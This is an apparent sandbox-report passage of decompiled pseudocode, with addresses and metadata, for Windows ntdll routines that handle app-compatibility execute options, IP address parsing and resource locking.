				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x832088; // 0x75c40b8d
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00787F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E007A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0075DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x834218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E007A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00760D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E007A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00768375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E007A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E007CE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E007A3F92();
					_t38 = 1;
					L2:
					return E0075E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                  0x00787f08
                                                  0x00787f0f
                                                  0x00787f12
                                                  0x00787f1b
                                                  0x00787f31
                                                  0x007a3ead
                                                  0x007a3eb4
                                                  0x00000000
                                                  0x00000000
                                                  0x007a3eba
                                                  0x007a3ecd
                                                  0x007a3ed2
                                                  0x007a3ee1
                                                  0x007a3ee7
                                                  0x007a3eec
                                                  0x007a3f12
                                                  0x007a3f18
                                                  0x007a3f1a
                                                  0x00000000
                                                  0x00000000
                                                  0x007a3f20
                                                  0x007a3f26
                                                  0x007a3f28
                                                  0x00000000
                                                  0x00000000
                                                  0x007a3f2e
                                                  0x007a3f30
                                                  0x00000000
                                                  0x00000000
                                                  0x007a3f3a
                                                  0x007a3f3b
                                                  0x007a3f53
                                                  0x007a3f64
                                                  0x007a3f69
                                                  0x007a3f6c
                                                  0x007a3f6d
                                                  0x007a3f6f
                                                  0x007ae304
                                                  0x007ae30f
                                                  0x007ae315
                                                  0x007ae31e
                                                  0x007ae321
                                                  0x007ae327
                                                  0x007ae329
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x007ae32f
                                                  0x007ae32f
                                                  0x007ae337
                                                  0x007ae33a
                                                  0x007ae33b
                                                  0x007ae33d
                                                  0x007ae33f
                                                  0x007ae341
                                                  0x007ae341
                                                  0x007ae34e
                                                  0x007ae353
                                                  0x007ae358
                                                  0x007ae35d
                                                  0x007ae35f
                                                  0x00000000
                                                  0x00000000
                                                  0x007ae365
                                                  0x007ae365
                                                  0x007ae368
                                                  0x007ae36e
                                                  0x00000000
                                                  0x00000000
                                                  0x007ae374
                                                  0x007ae32f
                                                  0x007a3f75
                                                  0x007a3f7a
                                                  0x007a3f7c
                                                  0x007a3f7e
                                                  0x007a3f86
                                                  0x00787f39
                                                  0x00787f47
                                                  0x00787f47
                                                  0x00787f37
                                                  0x00787f37
                                                  0x00000000

                                                  APIs
                                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 007A3F12
                                                  Strings
                                                  • ExecuteOptions, xrefs: 007A3F04
                                                  • Execute=1, xrefs: 007A3F5E
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 007AE2FB
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 007A3EC4
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 007A3F75
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 007AE345
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 007A3F4A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: BaseDataModuleQuery
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 3901378454-484625025
                                                  • Opcode ID: d94f4c5561c8655b2131c5916fef7299bb71663a3b12eac7ed1899079fb70a9f
                                                  • Instruction ID: 6b8a040df6364a84c5fa0d8309c37bfa40a076368d5868d037d57a2aedbd7d09
                                                  • Opcode Fuzzy Hash: d94f4c5561c8655b2131c5916fef7299bb71663a3b12eac7ed1899079fb70a9f
                                                  • Instruction Fuzzy Hash: 5941EC7168020CBADF20EE94DCC9FDA73BCAB55705F140599B605E6081E678EB46CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00790B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00790B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00768980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0075DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00790CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00790CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E007906BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E007906BA(_t135, _t178) == 0 || E00790A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00790CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00790CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E007906BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E007906BA(_t124, _t142) == 0 || E00790A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                  0x00790b21
                                                  0x00790b24
                                                  0x00790b27
                                                  0x00790b2a
                                                  0x00790b2d
                                                  0x00790b30
                                                  0x00790b33
                                                  0x00790b36
                                                  0x00790b39
                                                  0x00790b3e
                                                  0x00790c65
                                                  0x00790c68
                                                  0x00790c6a
                                                  0x00790c6f
                                                  0x007beb42
                                                  0x00000000
                                                  0x00000000
                                                  0x007beb48
                                                  0x007beb48
                                                  0x00790c75
                                                  0x00790c7a
                                                  0x007beb54
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x007beb5a
                                                  0x00790c80
                                                  0x00790c84
                                                  0x007beb98
                                                  0x00000000
                                                  0x00000000
                                                  0x007beba6
                                                  0x00790cb8
                                                  0x00790cba
                                                  0x00790cd3
                                                  0x00790cda
                                                  0x00790ce4
                                                  0x00790ce9
                                                  0x00000000
                                                  0x00790cec
                                                  0x00790c8c
                                                  0x007beb63
                                                  0x00000000
                                                  0x00000000
                                                  0x007beb70
                                                  0x007beb75
                                                  0x007beb7d
                                                  0x00000000
                                                  0x00000000
                                                  0x007beb8c
                                                  0x00000000
                                                  0x007beb8c
                                                  0x00790c96
                                                  0x00000000
                                                  0x00000000
                                                  0x00790ca2
                                                  0x00790cac
                                                  0x00790cb4
                                                  0x00000000
                                                  0x00000000
                                                  0x00790b44
                                                  0x00790b47
                                                  0x00790b49
                                                  0x00000000
                                                  0x00000000
                                                  0x00790b4f
                                                  0x00790b50
                                                  0x00000000
                                                  0x00000000
                                                  0x00790b56
                                                  0x00790b62
                                                  0x00790b7c
                                                  0x00790bac
                                                  0x00790a0f
                                                  0x007beaaa
                                                  0x00000000
                                                  0x007beac4
                                                  0x007beac4
                                                  0x00790bd0
                                                  0x00790bd0
                                                  0x00790bd4
                                                  0x00790bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x00790bdb
                                                  0x00790be0
                                                  0x007beb0e
                                                  0x00790a1a
                                                  0x00000000
                                                  0x00790a1a
                                                  0x007beb1a
                                                  0x007beb1f
                                                  0x007beb27
                                                  0x00000000
                                                  0x00000000
                                                  0x007beb36
                                                  0x00000000
                                                  0x007beb36
                                                  0x00790bea
                                                  0x00000000
                                                  0x00000000
                                                  0x00790bf6
                                                  0x00790c00
                                                  0x00790c03
                                                  0x00790c0b
                                                  0x00000000
                                                  0x00790c0b
                                                  0x007beaaa
                                                  0x00000000
                                                  0x00790a15
                                                  0x00790bb6
                                                  0x00000000
                                                  0x00790bc6
                                                  0x00790bc6
                                                  0x00790bcb
                                                  0x00790c15
                                                  0x00000000
                                                  0x00000000
                                                  0x00790c1d
                                                  0x00790c20
                                                  0x00790c21
                                                  0x00790c24
                                                  0x00790c24
                                                  0x00790c26
                                                  0x00000000
                                                  0x00790c26
                                                  0x00790bcd
                                                  0x00000000
                                                  0x00790bcd
                                                  0x00790b89
                                                  0x00790b89
                                                  0x00790b90
                                                  0x00000000
                                                  0x00000000
                                                  0x00790b96
                                                  0x00000000
                                                  0x00790b96
                                                  0x00790a04
                                                  0x00790a04
                                                  0x00790b9a
                                                  0x00790b9a
                                                  0x00790b9b
                                                  0x00790b9f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00790ba5
                                                  0x00790ac7
                                                  0x00790aca
                                                  0x007beacf
                                                  0x00000000
                                                  0x007beade
                                                  0x007beade
                                                  0x007beae3
                                                  0x00000000
                                                  0x00000000
                                                  0x007beaf3
                                                  0x007beaf6
                                                  0x007beaf7
                                                  0x007beafe
                                                  0x007beb01
                                                  0x00000000
                                                  0x007beb01
                                                  0x007beacf
                                                  0x00790ad0
                                                  0x00790ad4
                                                  0x00000000
                                                  0x00000000
                                                  0x00790ada
                                                  0x00790ae6
                                                  0x00790c34
                                                  0x00000000
                                                  0x00790c47
                                                  0x00790c49
                                                  0x00790c4a
                                                  0x00790c4e
                                                  0x00790c51
                                                  0x00790c54
                                                  0x00790c57
                                                  0x00790c5a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00790c60
                                                  0x00790afb
                                                  0x00790afe
                                                  0x00790b02
                                                  0x00790b05
                                                  0x00790b08
                                                  0x00000000
                                                  0x00790b08
                                                  0x00790ae6
                                                  0x00790b44
                                                  0x007909f8
                                                  0x007909f8
                                                  0x007909f9
                                                  0x00000000
                                                  0x00000000
                                                  0x007beaa0
                                                  0x00000000

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.507925412.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                                  • Associated: 00000005.00000002.507918640.0000000000730000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508051955.0000000000820000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508058546.0000000000830000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508065583.0000000000834000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508070836.0000000000837000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508077444.0000000000840000.00000040.00000001.sdmp Download File
                                                  • Associated: 00000005.00000002.508132551.00000000008A0000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: __fassign
                                                  • String ID: .$:$:
                                                  • API String ID: 3965848254-2308638275
                                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                  • Instruction ID: 02ca4966c9e4d626cc6e30b786d3cf5bc152c8cae27edc8fa855d7040fa470c0
                                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                  • Instruction Fuzzy Hash: D3A19D7592430ADFCF24CF64E8496FEB7B5EF16304F24856AD812A7241D7389A41CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00790554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E00790554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008301c0;
									_push(_t144);
									_push(0);
									_t51 = E0074F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00794FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E007A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E007A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E007D217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E007A3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00793915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008301c0;
												_push(_t138);
												_push(0);
												_t58 = E0074F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00794FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E007A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E007A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E007D217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E007A3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00793915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00775384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0074F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00793915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0074F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00793915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0074F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00793915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00775329(_t110, _t138);
																_t69 = E007753A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                  0x0079055a
                                                  0x0079055d
                                                  0x00790563
                                                  0x00790566
                                                  0x007905d8
                                                  0x007905e2
                                                  0x007905e5
                                                  0x00000000
                                                  0x007905e7
                                                  0x007905e7
                                                  0x007905ea
                                                  0x007905f3
                                                  0x007905f3
                                                  0x00790568
                                                  0x00790568
                                                  0x00790568
                                                  0x00790569
                                                  0x00790569
                                                  0x00790569
                                                  0x0079056b
                                                  0x00000000
                                                  0x00000000
                                                  0x007b217f
                                                  0x007b2183
                                                  0x007b225b
                                                  0x007b225f
                                                  0x007b2189
                                                  0x007b218c
                                                  0x007b218f
                                                  0x007b2194
                                                  0x007b2199
                                                  0x007b219d
                                                  0x007b21a0
                                                  0x007b21a2
                                                  0x007b21ce
                                                  0x007b21ce
                                                  0x007b21ce
                                                  0x007b21d0
                                                  0x007b21d6
                                                  0x007b21de
                                                  0x007b21e2
                                                  0x007b21e8
                                                  0x007b21e9
                                                  0x007b21ec
                                                  0x007b21f1
                                                  0x007b21f6
                                                  0x00000000
                                                  0x00000000
                                                  0x007b21f8
                                                  0x007b21fb
                                                  0x007b2206
                                                  0x007b220b
                                                  0x007b220c
                                                  0x007b2217
                                                  0x007b2226
                                                  0x007b222b
                                                  0x007b222c
                                                  0x007b222f
                                                  0x007b2232
                                                  0x007b2235
                                                  0x007b2235
                                                  0x007b223a
                                                  0x007b223f
                                                  0x007b2241
                                                  0x007b2243
                                                  0x007b2248
                                                  0x007b2248
                                                  0x007b224d
                                                  0x007b224f
                                                  0x007b2262
                                                  0x007b2263
                                                  0x007b2268
                                                  0x007b2269
                                                  0x007b2269
                                                  0x007b2269
                                                  0x007b226d
                                                  0x00000000
                                                  0x00000000
                                                  0x007b2276
                                                  0x007b2279
                                                  0x007b227e
                                                  0x007b2283
                                                  0x007b2287
                                                  0x007b228a
                                                  0x007b228d
                                                  0x007b228f
                                                  0x007b22bc
                                                  0x007b22bc
                                                  0x007b22bc
                                                  0x007b22be
                                                  0x007b22c4
                                                  0x007b22cc
                                                  0x007b22d0
                                                  0x007b22d6
                                                  0x007b22d7
                                                  0x007b22da
                                                  0x007b22df
                                                  0x007b22e4
                                                  0x00000000
                                                  0x00000000
                                                  0x007b22e6
                                                  0x007b22e9
                                                  0x007b22f4
                                                  0x007b22f9
                                                  0x007b22fa
                                                  0x007b2305
                                                  0x007b2314
                                                  0x007b2319
                                                  0x007b231a
                                                  0x007b231d
                                                  0x007b2320
                                                  0x007b2323
                                                  0x007b2323
                                                  0x007b2328
                                                  0x007b232d
                                                  0x007b232f
                                                  0x007b2331
                                                  0x007b2336
                                                  0x007b2336
                                                  0x007b233b
                                                  0x007b233d
                                                  0x007b2350
                                                  0x007b2351
                                                  0x007b2356
                                                  0x007b2359
                                                  0x007b2359
                                                  0x007b235b
                                                  0x007b235d
                                                  0x00775367
                                                  0x0077536b
                                                  0x00775372
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x007b2363
                                                  0x007b2363
                                                  0x007b2369
                                                  0x007b236a
                                                  0x007b236c
                                                  0x007b2371
                                                  0x007b2373
                                                  0x00000000
                                                  0x007b2379
                                                  0x007b2379
                                                  0x007b237a
                                                  0x007b237f
                                                  0x007b237f
                                                  0x007b2385
                                                  0x007b2386
                                                  0x007b2389
                                                  0x007b238e
                                                  0x007b2390
                                                  0x00775378
                                                  0x0077537c
                                                  0x007b2396
                                                  0x007b2396
                                                  0x007b2397
                                                  0x007b239c
